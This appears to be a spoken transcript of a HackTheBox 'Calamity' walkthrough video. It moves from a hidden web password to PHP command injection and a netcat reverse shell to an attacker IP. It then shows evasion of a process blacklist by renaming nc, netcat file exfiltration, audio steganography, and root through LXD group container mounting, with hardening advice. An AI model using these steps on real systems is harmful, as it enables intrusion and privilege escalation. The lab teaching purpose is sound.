What's going on, YouTube? This is IppSec, and it is that time. Calamity is retired. Soon, you'll know how to get root on Calamity, but it's not the root you're looking for. Unfortunately, I don't have enough time right now to properly step through the binary on Calamity. Instead, you're going to get a unintended privesc that the user Booge has been using on several other HackTheBox machines. I'm assuming if they were unintended on our machines, it probably will be in other boot to roots as well as useful on pen test engagements. If you want to know more about that, a link is in the description to his blog, or you can stay tuned and watch the video. The TLDR is the Linux containers can provide root access if users are a member of the LXD user group, so definitely check that. Once knowing the method, all we had to do was check the output of linenum.sh or linprivchecker.py to see if boxes were vulnerable. It is that obvious because, again, it's just who is a member of a user group, which makes it even cooler that we only know of one person that has exploited a box this way, and how many hours have been spent doing it the hard way is probably a unfathomable number because the binary on Calamity is tough. Anyways, let's jump in and get to that privesc that I know you all want. Before we do anything, we have to nmap the box, so we'll do that with nmap-sc for default scripts, sv, enumerate version, oa for output all formats, call the file Calamity, and then the IP address Calamity, which is 10.10.10.27. Takes some time to run, so I've already ran it. Looking at the output, we do have SSH and HTTP listening. Can't do much with SSH, so let us look at HTTP. We can go to the IP address 10.10.10.27, and we get a web page. It's odd that, okay. For some reason the image wasn't loading, but there we go. Web page is there. We can test a few things right off the bat, like /robots.txt and like /admin. Don't see anything. Look at the source code of the page. Nothing there, so let's throw it in GoBuster to try to find information. So we do /opt GoBuster, and we have to do -h. One thing worth noting is GoBuster just updated. 1.4 is the newest version. I'm on 1.3 still, but if you use GoBuster, be sure to update. So looking at the usage of GoBuster, we will want to do a -w for the word list. And that's going to be user share, word list, dirbuster, directory list, 2.3 medium. That's the one I normally use. -x for file extensions we want to search. We'll do PHP, HTML. And then, let's see, -u for the URL. HTTP 10.10.10.27. -t for threads. We'll do 25 threads. So right off the bat, we have a few folders /uploads and /admin.php. So let's check it out. Uploads is blank. And we have admin.php, which is a user login form. So we'll just do admin gets a failure. If we look at the source code, we do see something odd. We have a scroll bar. If we scroll all the way to the right, it's stupid, I know, but we have a password. Scupido Technus. I don't even know what this is, so let's throw that in Google Translate. If it's stupid, I know I'm going to laugh. Come on. Detect. Translation. That's a word? No way. Yeah. So, I don't know what that is, but that is going to be the password. So if we copy that, the other thing to note, we have password username, but the fields name equals user, name equals pass, so they're reversed. Maybe that was a hint to look at the web page source. But put the username and password, log in, and we get to the page. So we see a lot of talk about pro on PHP, HTML's harmless. We can write HTML. and it parses it. So if we Control U to view the source, we see that HTML. If we do a PHP tag, system, we'll just do ls-la, show me the page, and we get ls output. So easy code execution right there, just executes PHP. So let us do a reverse shell. And see, we'll first if config, get our IP, and then lvnp1234. Our IP is going to be 1423. That would be important to remember. Whenever I do reverse shells, I just go to pentestmonkey reverse shell. Come on. This netcat one is really reliable, so that's the one I'm going to start off with. I'm going to do php that /php, change our IP. We were 14.23. Copy this, show me the page. Did not work. So let us throw that into burp and do our own encoding on it. So test, edit this, go to burp proxy, send a repeater, paste that in, and we can see this is all sorts of messed up. So it's always helpful to be able to look at everything you're typing instead of just a small text box. I forgot the question mark right before the PHP tag, and I need to put system between this because all that is not just raw PHP code. So put that around system so it executes that. And now we should be able to encode this, go, look at that, we have a shell and it just dies. So I'm going to try that again, because at first I was a bit puzzled by this. Shell and it dies. So my thing was, let's see, let's call this shell, and we'll create a new tab and we'll call this commands. What I did next was simplify this and verify I could just run system commands. So as a sanity check, let's just run ls plus semicolon sleep 10 seconds, and we'll do who am I. Click go. This should probably take about 10 seconds to run. And my main thing is I'm trying to see if the process actually finishes, because that netcat died almost instantly, and we see the whole thing finished. So we know it's not an issue executing commands. My next thing was I did a find plus /home to see what files are there. And I could do etc and other directories as well. Cannot assign address not available. Go. Okay. That was odd. And we get a lot of files. So I'm going to simplify this a little bit and just do +-ctime minus 60. And that's going to say, hey, find me all the files that have been modified within the last 60 minutes in home. And we get one file, home Zalvis intrusions. So let's look at that file. If we do cat on the file name, we have things saying blacklisted process on netcat python sh. So let's change our process so we're no longer netcat. We can just cp /bin nc to /dev shm nc. And this is just the RAM disk. It'll go away once it reboots. So if we do that, and then go back to our shell, actually no, we have to change the name. We just did nothing there. We'll call it IP. And then we will also chmod it to be 755. Go back here where it says netcat, and we'll do dev shm/nc. Turn this on, click go. We get a shell, and it died because I didn't specify IP. There we go. Click go, and we get a shell, and it looks like it's no longer dying. Awesome. So we have low privilege shell on the box. Python was also one of those blacklisted processes, so I'm not going to improve my TTY because it'll just die. So let's poke around at what we have. We got home, Zalvis, and going in that, we have that user.text, recov.wave, ls on app, can't get in it, ls-la so we can see what's directories and what's not. Let's go into alarm clocks. We got rick.wave and zorus.mp3. I don't know what that is, but let's copy all those files to our box. So let's open up a new pane and do Zalvis files. So if you do nc nvnlp, we'll call this port 88, no, 3 nines. I don't know why thinking a port was hard, but it was. And then we'll just send this to, let's see, rick.wave. Go back here, /dev shm IP. Then we have to go to our IP, which is 10.10.14.23, port 999, and we're going to send rick.wave. Paste, we got to connect, finished, md5sum, rick.wave, md5sum.wave. Got the same exact file on both ends. So let us do the next file, which is, I'm not even going to try to pronounce that or type it. Where is it? There it is. Send that file. And then dev shm ip 10.10.10.14.23. And then the last file we had was recov.wave. So we're going to send all 3 of those. And out of habit, I gave them MP3 extensions. I'll fix that in a second. I don't know where my mind is today. Okay, let's fix this. I've already done that one. What was the last one? Rick? Rick is good. Okay, they are all WAV files now. So the only thing left to do is try to open one of the files and see what it is. So open recov.wave, and it didn't open, so I think Totem may be a player. And we don't have any sound. Let's turn this up. So I'm not sure if you heard that. It's hard to share sound between my VM and recording application. I'm sure it's possible. I just don't have time to do it. So I played it really loud, hoping my headphones pick it up. If you couldn't tell, that is Rickroll. So the next thing to do is, I guess, test all the waves. So rick.wave, got it again. And then the last file was that Z1, so let's look at what this is. So we got 3 files. We could do exif tool on them to see if there's anything hidden in them. Let's see. Nothing there, really. Nothing there. A comment, isn't this where we came in? But nothing really in any of the files. That exif data, though, is going to give us a different MD5 sum. So we don't know if the wave file in recov is the same as in ric. So what I did is I did a pip install audiodiff, and we can pull up the man page here. It's a Python application. Audiodiff. And why isn't that going quick? Come on. Load. Proxy's disabled. What's going on? Except off? I guess it's enabled here. I was stupid and was lazy or something, and it do Foxy Proxy. There we go. Anyways. Audio diff pip. Don't want that one. I want read the docs. This kind of explains it. You can do pip install, then import, and we have audio equal. So let's try that. I've already installed it, so just do Python import audio diff, and then they just did audio diff audio equals. So recov.wave and ric.wave. And we have the actual waves not equal to it. So this is where it's a little steganography challenge, and you have to kind of think like the creator. Why would he have two files that are really similar, the same song, but have different waves? Why isn't the rickroll the same wave on both of these files? And the answer is, well, let's inverse the files. So we'll take the inverse of ric.wave and play it against recov.wave and see if there's anything hidden in the data. If you don't know how wave lengths work in sound, I don't really know either, but if you play the exact inverse of a wave, it cancels out and you don't hear anything. So that's how like noise canceling headphones work, and noise canceling headphones have a microphone, so they can play the inverse of the wave on what's outside of the headphone. Or at least that's how some of them work. And that's why they require batteries. So the easiest way to do that is through a tool called Audacity, and fail to open sound device. That's always awesome. File, let's see if it plays. Documents, HTB, boxes, Calamity. I can't hear anything. Well, that's not going to be helpful. No. Try it again. If at first you don't succeed, try, and try again. Still nothing. Sound is on. Edit. I'm going to pause this and we'll do it on my host machine. That'll be easier. Okay, and we're now on my host. So let us import audio. We can import ric.wave and file import recov.wave. So if we play these files, they sound exactly the same, but we can highlight everything and go to effect, invert, and that'll invert them against each other. That should have inverted them against each other. Let's try that again. Effect, invert,
47936 dot asterisk.
And we get some weird stuff. And once we get near the end, we get something else. Come on.
Your password is 185.
So, if you remember from the beginning, I can't easily go back to my Kali, but there was an exif tag that said something about a loop. So if we play this,
Your password is 185.
so
Your
185.
password is 185.
So we'll do 185 and go to the very beginning, which is a good place to start.
Four seven nine three six dot asterisk. 479
479.
47936 dot asterisk. 47936 dot asterisk.
I think that's it. I think that'll be the password for Calamity. If you're wondering about my interface, I use i3 personally. So that's how I opened that terminal so quick, and it split it, just like Tmux. So we'll copy this and go over into my Kali VM. So go there, full screen. And it wasn't as hard to get to Kali as I thought. I don't know what I was thinking. But we can close that. Did copy. So the user was Zalvis. So SSH Zalvis at 10.10.10.27. Put the password in, and we get in. So that's how we did that. Mute that. I don't like that sound. And on this box, my first thing was I don't want to do this good luck binary. It's an application. You have to do multiple buffer overflows to get it. So I thought about looking at intrusions, and my first guess was, okay, well, if he's just doing like os.kill or doing a pkill syscall on file names. So if it was like pkill gibberish, and we can do sleep 5. And we see it executes our sleep 5 command. So if we can get sleep 5 in here, and he's just passing it natively to a syscall, we may be able to get code execution. So that was the very first thing I did. It's not successful, but it's a cool test. So we'll touch, and we'll test sleep 100. And we should do NC that. And we look at the file. We didn't want that backslash. So rm NC. Go back here. Copy this. Create that file. And then we're going to copy the actual executable NC to that. And then we can chmod it to be 755. And lvnp. Listen report, let it get killed, do a ps-ef grep for sleep. And unfortunately, we don't see it. So we didn't have code execution there. We can look at intrusions and see we did pass it. So he has some type of filtering in that script. I actually don't know what it is. I didn't look when I got root the last time. But now it's time to do the unintended root with whatchamacallit? LXD. Or containers. LXC. So let's jump in. Apologies for the choppiness, but I did want to make a quick edit after I watched the video to stress the fact that this may primarily be a boot to root type issue and not some crazy security issue, because the use case for this exploit does require the member being a member of sudo or the first user installed with the system. And production use cases those users are considered admins anyways. In boot to root or CTF's use case, generally we're lazy and install a system, we get a user with that installed system and try to strip admin and overlooked one small detail that left an admin privilege on the user. So the boot to root CTF use case is much better than the production, but it's going to look bad. Additionally, if we did things that people should be doing in production and following like security hardening guidelines when installing things, we would have noticed that the default Ubuntu installer creates a user account during install. Duh. However, it is recommended that this account should be considered administrator and not assigned to the end user of the device. So again, if we follow that, this is a non-issue. And that's essentially what the GitHub request will be saying, why they closed it, and saying, hey, members of this should be considered admin anyways, but in the end, should be documented a little bit better, and of course, DSysdig checks should be able to catch things like this. So if you follow proper hardening, then hopefully this isn't a issue in production. And this just stresses the fact that you should follow compliancy because in hindsight, most things that are major exploits, the impact would have been lessened if you followed some type of compliancy. So all that being said, let's jump in and actually see the root. So it is worth mentioning that this probably affects a lot of other virtualization technologies. So being members of the Docker, QEMU, KVM, libvirt, whatever groups could be dangerous, and you should look into that as priv-esque things, because those generally need elevated privileges on the host. LXC is just what we're looking at in this video, but I'm sure other things are affected as well. So it's just one of those things sysadmin should be extra careful when doing some things. Back in 2016, we see this issue was reported. These commands are worth noting because they do still work. So essentially, it's just saying, yeah, it's kind of a requirement for these applications to work. Be careful who is in the LXD group, which is a valid response. And then in 2017, another user, I believe this is Bouge, created a request saying, hey, there's a priv-esque if you're a member of the LXD group. And the response is essentially saying, yes, at the time of install, LXD adds members of the sudo group to the LXD group so they can actually use the LXC application. And it's not really that much of a security risk because if they're in the sudo group, they should be allowed to become root anyways. This, little bit of a misnomer, but again, it comes down to at the time of install, it's probably fine for them to have that access because they were root. But when you harden a box, things like this can get overlooked just because you don't realize the impact of LXD groups in general. So be careful with that. And then we do have Bouge's blog, which is in the description, that explains how to exploit this. So let us begin. Create a new shell. The first thing I'm going to do is download LXD Alpine Builder because, number one, well, first of all, what LXC is, it's a Linux container. It's kind of like a VM. It's not full virtualization, it's some virtualization. You can look more into it there. But if we just try to do Ubuntu, that image is going to be really big. So we're going to create a Alpine Linux image, which is really small. It's like a gigabyte versus 2 megabytes. And number two, HackTheBox doesn't have access to the internet, so we can't pull a Ubuntu image easily. So we're going to git clone on the repository, and then go in here, and just build Alpine -A for architecture, and we want 32-bit, which either i686 or i386 should work. Start installing it. And once this finishes, we should have a tar file. So ls-la, we do. And we're going to SCP that to Calamity. So let's cat Calamity's password. Get this. I don't know what I just did. I guess resized it. There we go. SCP Alpine to 10.10.10.27, and we'd specify Zalvis, paste it, and we can SSH there. Just work in this directory so it's a little cleaner. We don't have other files. And we can remove that netcat. So //nc. Okay. So the very first thing we have to do is import this image into LXC. So we can do that with LXC image import and specify the name. And I think we do aliases just a space in this command. See if that works. Hopefully it does. It'll take about a minute to import this. And essentially what this is doing is just unzipping this and building a machine that is deployable. The next step is going to be init, which actually creates the machine. This is just creating the machine template. So it looks like that second thing didn't help me at all since it has error opening. So let's LXC image list, see if it imported. It did not. We'll try -- alias. Alias Alpine. There we go. It imported the image. So LXC image list. We have the image there. So we can do the init to actually create a machine. So LXC init Alpine. We'll call this machine privesc-c security.privileged equals true. I don't know exactly what this flag does, but it was said to do it in the GitHub. So we created the machine, so we can just do LXC list to list machines. That is different than LXC image list. So the next thing is to add a hard drive to this. So as said in the GitHub, LXC config device add blah root disk. So what we're going to do is LXC config device add. So our host that we're adding it is privesc, and we're going to call the device host-root. And next thing will be source equals / path equals /mount /root. So this is telling the VM, hey, mount / into /mount root. And I have an error in my config. Awesome. Zalvis, what did it say? Wrong number of subcommand arguments. LXC config divide. That's odd. Device. Add privesc host root. I forgot to say disk. It is hard to type and talk. So add, is it right here, disk. So what we did, LXC container, go into the config, adding a device. The container we're adding to is called privesc. The device we want to create is called host-root. The actual type of device is disk with the source of / and a path of /mount /root. So if we do LXC exec privesc /bin sh. Oh, we have to start it. LXC start privesc. And then LXC exec privesc bin sh. And now we are root. And if we go to /mount /root, we have a file system. We can go into roots folder and access root.txt. Looking at the Python script, that we tried to exploit earlier. Let's see why it didn't work. Python, open, netstat, chmod temp. Oh, he's not using pkill. So I thought he was doing pkill-9 user input. He is going through netstat, grabbing PIDs of processes, and passing the PID. So our user input never makes it into the os.system command. So no privesc there, that's why it didn't work. But one thing I wanted to test real quick is I don't have LXC installed on my Ubuntu host, and I want to see if it actually adds every user of the sudo group. So we have a Ubuntu host with LXC not installed. What we're going to do is verify that LXC, upon install, adds users of the sudo group to the LXD group. So first thing to do is let's be a dumb admin and harden the sudo file. Oh, that's the password for my account in this box. I didn't realize it wouldn't even ask me for a password. But anyways, let's go to sudoers and remove that. So even though Ipp is a member of the sudo group, he can't sudo because we removed that ability the way we know how. We didn't think to remove the group. We just removed it from the file. So if we do a su now to get back to root, we're there. So let us install LXD. Apt install. Got some scheduled task is running. LXD client. There we go. We run the fake race. Yeah, we won the fake race. But anyways, we are now installing LXD, and it should add our user to the LXD user group, and then we're going to try the privesc again. So, okay, su-ip groups, and I am a member of LXD, and I can't sudo, but I'm a member of the group, so I should be considered as admin on the server. So, let us go pull the package, and I just realized probably don't have git, so apt install git. Yes. And let's see, Alpine LXD GitHub, or LXC GitHub. Is it LXD maybe? There we go. LXD Alpine Builder. So we can get clone that cd in there, build Alpine, move this to Ipp. Okay, so now let us just rerun what we did. So LX, remind me later, LXC image import Alpine -- alias Alpine. Start your container. Okay, it is imported, so we'll do LXC image list. We see it's there, so next step is to take the image and create a container. So LXC init Alpine, and we will call it privesc, and add that -c security privileged equals true flag. No storage pool found, so let's run LXD init like it says. leave everything as auto. Crap. And go again. So we created the privs container. So next thing we can do is LXC config device add privesc root disk was it host dash root we used, just because that it can be anything, but it just makes logical sense to me to name it that. Disk source equals slash path equals slash mount root. Okay, it's been added. LXC exec on privesc ben sh. I forgot to start it again. We are root. If we go to slash mount root, and yes, we are now root on the host OS. So be careful with installing virtualization technologies just because what they may add you to groups. It makes sense because the applications have to do these things. It's just one of those things of admins not fully reading exactly what is intended. And that's why almost every hardening script will say things like, make sure users are not members of groups they don't need to be, because of things like this. I don't know what the ADM group does, but I'm assuming I don't have to be a member of it, or the sudo group if I'm not using sudo. And even if I am using sudo, I may just hardcode my username to have limited sudo privileges. So be careful what you give users a member of groups. But hope you enjoyed the video. That'll be it. Take care.